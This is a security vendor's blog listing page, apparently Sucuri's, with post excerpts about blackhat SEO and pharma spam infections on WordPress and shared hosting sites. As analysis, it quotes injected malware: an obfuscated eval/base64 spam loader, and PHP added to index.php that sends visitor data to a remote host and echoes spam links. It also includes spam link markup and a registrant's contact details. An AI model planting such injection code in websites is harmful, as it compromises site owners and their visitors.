Website Cross-contamination: Blackhat SEO Spam Malware

We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:

Read More

Intelligent (Pharma) Spam Decoded

We are seeing a rise in the use of intelligent SPAM – a.k.a Pharma Hack – across a number of platforms. We recently found a nice injection that made us salivate, we figured you’d be just as interested

It is of no surprise to us that attackers are always looking for ways to trick us and more importantly our users. This gem of a find was no different.

SPAM = “Stupid, Pointless Annoying Message”.

SPAM, in the form of unsolicited e-mail messages, is a problem that we face every day.  Imagine sending a client a link to a newly released product, they get to the page, and BAM they’re greeted with advertisements for pharmaceutical products (Viagra / Cialis / Male Enhancers). What do you think the impact would be?
Read More

DreamHost Security Issue Prompts FTP Password Resets

Yesterday on the DreamHost Status Blog, it was announced that all shell/FTP passwords would be reset due to what looks to be a security breach that was discovered on one of the DreamHost database servers.

DreamHost Security BreachDreamHost looks to have done a great job notifying affected customers via the update page, keeping them up-to-date throught out the day until the issue was resolved. It looks like all FTP passwords were indeed reset.

We recommend that all DreamHost customers log into to their accounts and check their account status. It is encouraged that you change your account passwords, and it wouldn’t hurt to change your FTP and database passwords again just to make sure.

Read More

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..

Read More

Mass Spam Infection From Wplinksforwork Dot Com (50k+ WordPress Sites Hacked)

Last year we spoke about the siteurlpath blackhat SEO attack that was infecting many WordPress sites with spam.

But, how many? We had no clue at the time. Today, we decided to check on Google and it seems that almost 50k (yes, fifty thousand sites) were compromised, at minimum…

How do we know this? Well, the attack consists of contacting the domain to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised (if they have display errors enabled), have this message in their footer:

Warning: file_get_contents( 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..

Read More

Mass Compromise of Sites at – SEO Spam

A regular topic of discussion the past few months has been the basicpills link injection (a type of blackhat seo spam) on WordPress sites.

If you are not familiar with it, thousands of sites have been infected with basicpills which injects a ton of spammy pharma links all over compromised site (It infiltrates WordPress and attacks the wp-posts table).

So what’s that have to do with getting compromised? Well, in the past, the attackers would inject links directing to or, sometimes something else but similar. The seem to have changed tactics, now they are injecting links to an image directory, like:

Read More

Host4africa Mass Compromise

We are seeing a lot of sites hosted at compromised with Blackhat Spam SEO. Most of them are in the TLD (at and and have hidden links to generic drugs (common Pharma Spam).

When you on click on links added to the compromised sites you are redirected to a Pharma page, like this one:

The number of sites compromised is pretty large. Here are some we identified on one site:

Read More

Python: No such file or directory – Your site is likely compromised

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh:  /usr/local/bin/python: No such file or directory

It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distrubution domains were broken and generating an error. So any hacked site would display that error instead of showing the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

        $url = "http://apollos&#46com&#46tw/LHRS/12/request&#46php?ip="&#46$_SERVER['REMOTE_ADDR']&#46"&useragent="&#46urlencode($_SERVER['HTTP_USER_AGENT'])&#46"&referer="&#46urlencode($_SERVER["HTTP_REFERER"]);
        $answer = file_get_contents($url);
        if (strpos($answer,"noredirect") === false) {
                echo $answer;

As you can see, it attempts to connect to to get the list of links to display. However, if you access this domain now you will get a python error instead…

Those are some other domains being used in this spam campaign:

If you are unsure if your site is compromised, try doing a quick scan here:

Links Injection on WordPress – Blackhat SEO Spam (basicpills) update

For the last few months we’ve been tracking a very large blackhat SEO spam campaign initiated by, and many other pharma-related domains (mostly located at and

The method used is very simple, where the attackers inject a single spam link on every post of the web site (generally WordPress). These are some of the links you will see in an infected site:

<a href="http://247pharmaceutical. com/">online prescription drugs without  a prescription..

<a href="http://webemed. com/">Buy  Generic  Cialis Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

The really annoying part is that the domain and anchor text change on every post, making it very hard to delete and detect. These are some of the domains being used:

Some of these domains are being registered through Godaddy by:

Administrative Contact:
York, Steve
6041 Pierless Ave
Sugar Hill, GA 30518
United States
7709450281 Fax —

And we would love to get them disabled.

For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately, and checking the permissions of your wp-config.php file.

If you need help cleaning up the mess, send us an email, or visit us over at Sucuri.

If you have any questions or comments, please let us know.

Link injection on hacked WordPress sites – Blackhat SEO spam

The last few months we’ve been tracking, and helping webmasters affected by a very large blackhat SEO spam campaign initiated by, and many other domains located at

This campaign has infected thousands of WordPress sites, and has injected spam links directly into their databases (the wp-post table). These are some of the links you will see in an infected site:

<a href="http://basicpills . com/">online prescription drugs without  a prescription..

<a href="http://generic-ed-pharmacy . com/">Buy  Generic  Viagra Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

Read More